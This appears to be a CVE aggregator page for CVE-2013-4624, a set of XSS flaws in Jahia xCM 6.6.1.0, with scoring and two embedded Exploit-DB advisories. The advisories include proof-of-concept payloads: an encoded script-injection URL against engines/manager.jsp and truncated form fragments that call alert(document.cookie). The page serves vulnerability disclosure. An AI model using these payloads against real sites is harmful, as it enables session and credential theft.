CVE-2013-4624
published 2013-11-27CVE-2013-4624: Multiple cross-site scripting (XSS) vulnerabilities in Jahia xCM 6.6.1.0 before hotfix 7 allow remote attackers to inject arbitrary web script or HTML via (1)…
PriorityP419medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
1.44%
69.9th percentile
Multiple cross-site scripting (XSS) vulnerabilities in Jahia xCM 6.6.1.0 before hotfix 7 allow remote attackers to inject arbitrary web script or HTML via (1) the site parameter to engines/manager.jsp, (2) the searchString parameter to administration/ in a search action, or the (3) username, (4) firstName, (5) lastName, (6) email, or (7) organization field to administration/ in a users action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| jahia | jahia_xcm | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Jahia xCM - '/engines/manager.jsp?site' Cross-Site Scripting
exploitdb·2013-07-31
CVE-2013-4624 Jahia xCM - '/engines/manager.jsp?site' Cross-Site Scripting
Jahia xCM - '/engines/manager.jsp?site' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/61571/info
Jahia xCM is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
An attacker could exploit these vulnerabilities to execute arbitrary script code in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Jahia xCM 6.6.1.0 r43343 is vulnerable; other versions may also be affected.
http://www.example.com/engines/manager.jsp?conf=repositoryexplorer&site=%3C/script%3E%3Cscript%3Ealert%28docu ment.cookie%29;%3C/script%3E
Exploit-DB
Jahia xCM - '/administration/' Multiple Cross-Site Scripting Vulnerabilities
exploitdb·2013-07-31
CVE-2013-4624 Jahia xCM - '/administration/' Multiple Cross-Site Scripting Vulnerabilities
Jahia xCM - '/administration/' Multiple Cross-Site Scripting Vulnerabilities
---
source: https://www.securityfocus.com/bid/61571/info
Jahia xCM is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
An attacker could exploit these vulnerabilities to execute arbitrary script code in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Jahia xCM 6.6.1.0 r43343 is vulnerable; other versions may also be affected.
alert(document.cookie);">
document.main.submit();
alert(document.cookie);">
alert(document.cookie);">
alert(document.cookie);">
alert(document.cookie);">
alert(document.cookie);">
document.main.submit();
No writeups or analysis indexed.
2013-11-27
Published